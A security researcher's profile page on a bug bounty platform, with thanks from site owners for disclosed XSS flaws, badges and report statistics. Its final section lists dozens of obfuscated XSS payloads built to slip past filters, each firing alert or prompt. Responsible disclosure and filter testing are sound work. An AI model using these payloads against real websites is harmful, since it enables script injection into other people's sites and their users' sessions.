Gh05tPT Top Security Researcher of the Month Top VIP Security Researcher of the Month | Security Researcher Profile
Security researcher Gh05tPT has already helped fix 12509 vulnerabilities.
Researcher reputation: 830
Real name:
#Gh05tPT #inurlBR #AccessSecLab
About me:
http://blog.inurl.com.br/
https://ccess.co/
Contact email:
[email protected]://twitter.com/Gh05tPThttp://blog.inurl.com.br/https://facebook.com/InurlBrasilhttps://facebook.com/podzemie4544https://facebook.com/exchangesechttps://ccess.co
Alternative Contacts:
http://blog.inurl.com.br/
Experience in Application Security
over 5 years
Award / Bug Bounty I prefer:
A thanks/profile recommendation will be really appreciated, but if you'd like:
# Bug Bounty ($$$)
# Hall Of Fame
# T-shirts, Sweats, Caps, Stickers, Keychains, etc
Halls of Fame:
https://www.pejadesign.com/chi-siamo/chi-siamo#manyThanks.
https://unite.un.org/content/hall-fame
Ethics and Rules:
#Gh05tPT #inurlBR #AccessSecLab is required to abide by the ethics and rules of the Open Bug Bounty project. If you reasonably believe that rules are not respected, please report this to us.
Recommendations and Acknowledgements | Full List:
Very helpful with some major security vulnerability on our site. Thank you. |
Gh05tPT found an XSS vulnerability, provided us the information necessary in order to patch the vulnerability. Thanks for your assistance! |
Dear Gh05tPT, The University of Vienna would like to thank you for your valuable contribution in finding multiple website security issues. Your input is highly welcome and helps to raise the security level of our educational institution. Servus and greetings from Vienna, Austria. |
Thanks for your help, very professional and helpful. |
Research privately disclosed XSS vulnerability. Thank you for the notification! |
Gh05tPT found a XSS vulnerability on our site. Thanks so much |
Gh05tPT found an XSS vulnerability, provided us the information necessary in order to patch the vulnerability. Thanks for your assistance! |
Gh05tPT found a XSS vulnerability on our site which I was able to fix quite quickly. Thanks for your help. |
Thanks for the XSS report. We should be able to get the issue fixed next patch. |
Thanks for the details about the failure found on one of our sites. |
Thank you for your help, for the detail of XSS vulnerabilty. Much appreciate. |
Thanks for reporting XSS issue on my site. Clear report, helpful support. :) |
O Gh05tPT reportou uma vulnerabilidade em um sistema do órgão em que trabalho e nos ajudou a solucioná-la logo no primeiro contato. Muito obrigado. |
Was very easy to contact Gh05tPT and get the information needed to help fix the vulnerability found on our website. Wonderful security researcher to deal with and I'm glad that people like this exist to help make the internet a more secure and safe place. |
Gh05tPT has found an XSS vulnerability on one of our pages. He is very helpful and responded very quickly. I really appreciate it. Thank you very much. |
One more XSS bug discovered and patched thanks to Gh05tPT. Much appreciated! |
Dear, Thanks for participating in responsible disclosure program. The reports you submitted were extremely helpful to our team and provided us the details we needed to resolve the issues that you identified. We are deeply committed to provide a safe and secure experience to our users and are therefore grateful for your efforts to help us improve our services. Best Regards! |
Gh05tPT found a XSS vulnerability on my site which I was able to fix quite quickly. Thanks for your help. |
Gh05tPT found a XSS vulnerability on one of our sites. We will fix it on the next version of our CMS. Thank you very much for your help! |
Gh05tPT helped us discover and fix an XSS vulnerability on our website. Much appreciated! |
Gh05tPT found a XSS vulnerability on our website, which was promptly resolve with his help. Really good communication and sympathy. Thanks |
Gh05tPT found a XSS issue in one of our systems and provided us the technical details to help solve the problem. Thanks! |
Gh05tPT found a basic XSS vulnerability on our website. Some javascript could be entered as a parameter in a GET query and though it wouldn't be processed as form data, it could be reflected out again (unescaped) on the search results page. Thanks very much Gh05tPT. |
Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help! |
Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help! |
Thank you for helping mudconnect by reporting the XSS vulnerability Gh05tPT! |
Gh05tPT found a security problem in one of our services. Once contacted he responded quickly and professionally. Thank you very much! |
Thanks to @Gh05tPT for helping us to increase the security of one of our web applications. Keep up the good work! |
@Gh05tPT reported a XXS vulnerability on our site. Thank you very much! |
Gh05tPT found a XSS vulnerability on our website and was quick to respond with technical detail. It's cool to find online researchers with this efficient profile. |
Really appreciate your help in detecting and helping us resolve our XSS issue. We were able to communicate together and get it fixed within a weeks time. Thanks again! |
Thank you Gh05tPT for the amazing job on pinpointing a weakness on one of our websites! |
Thank you Gh05tPT for pointing out a security issue on our server, appreciate your work! |
Thanks Gh05tPT for reporting us the issue on our website, we check and solve. Very good work. |
Thanks to @Gh05tPT for reported bug and helpful feedback to solve the vulnerability. |
Thanks a lot for reported bug by Gh05tPT. Very fast response and very helpfully. Keep up the great work! |
Gh05tPT found a security problem on one of our servers. I recommend him because he responded quickly and professionally. Thank you very much. |
Gh05tPT found a XSS vulnerability on our websites and was quick to respond to an email with technical detail. Thank you for that. |
Gh05tPT found a XSS vulnerability on our websites and was quick to respond to an email with tecnical detail. |
Em nome da Animais de Rua, obrigado pela ajuda! Gh05tPT encontrou um problema na página, respondeu rapidamente às perguntas colocadas e ajudou a resolver o problema. Obrigado! |
Thanks a lot, it is great when people help each other. Keep up the good work. |
Gh05tPT found a XSS vulnerability on our websites and was quick to respond to an email. We appreciated his help very much. |
Thanks for the helpful and friendly communication with me on behalf of the web site owner I was checking this issue for with you. Keep up the good work. |
Gh05tPT discovered an XSS vulnerability on our website and communicated the details to us very promptly. We are very grateful to him for his assistance and advice. |
Thx for reported bug @Gh05tPT, quick to respond and helpfull do solve vulnerability |
こんにちは Mr.Gh05tPT 脆弱性の指摘をいただき、感謝いたします。 あなたのおかげで、私達のwebサイトのセキュリティを強化することができます。 |
Gh05tPT was quick to respond, very polite and helpful during the resolution of the XSS vulnerability. A kind thank you from the team. |
We thank you for your colaboration and responsible disclosure! |
Gh05tPT found an XSS bug on my website. Many Thanks! |
こんにちは、ミスターGh05tPT 脆弱性の詳細を教えてくれてありがとう。 あなたの行動のお陰で、私たちのサイトのセキュリティが向上します。 私はセキュリティアップデートを適用する予定です。 |
Honor Badges
Number of Secured Websites
|
|
|
|
10+ Websites
|
50+ Websites
|
500+ Websites
|
WEB SECURITY VETERAN
1000+ Websites
|
Advanced Security Research
|
|
|
|
WAF Bypasser
|
CSRF Master
30+ Reports
|
AppSec Logic Master
30+ Reports
|
Fastest Fix
Fix in 24 hours
|
Outstanding Achievements
|
|
|
|
Secured OBB
|
OBB Advocate
|
Improved OBB
|
Commitment to Remediate and Patch
|
|
|
|
Patch Master
55% Patched
|
Patch Guru
65% Patched
|
Patch Lord
75% Patched
|
Recommendations and Recognition
|
|
|
|
REPUTABLE
10+ Recommends
|
FAMOUS
25+ Recommends
|
GLOBALLY TRUSTED
50+ Recommends
|
Distinguished Blog Author
|
|
|
|
1 Post
|
3 Posts
|
5+ Posts
|
Research Statistics
Total reports: | 31213 |
Total reports on VIP sites: | 1024 |
Total patched vulnerabilities: | 12509 |
Recommendations received: | 52 |
Active since: | 05.04.2018 |
Top Security Researcher Awards: | Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month |
Top VIP Security Researcher Awards: | Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week |
Reported Vulnerabilities
All Submissions VIP SubmissionsFeatured Submissions
Domain | Reported | Status | Type |
---|
04.04.2019 XSS alert() variants
<script>prompt(1)</script>
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script> <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script> <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script> <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script> <script>throw~delete~typeof~prompt(1)</script> <script>delete[a=alert]/prompt a(1)</script> <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script> <script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script> <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script> <script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script> <script>Array.from`${eval}alert\`1\``</script> <script>Array.from([1],alert)</script> <script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u> <videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script> <script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script> <script>x=new class extends Function{}('alert(1)'); x=new x;</script> <script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script> <script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1) <svg><script/xlink:href=data:,alert(1)></script> <frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>
Please login via Twitter to add a recommendation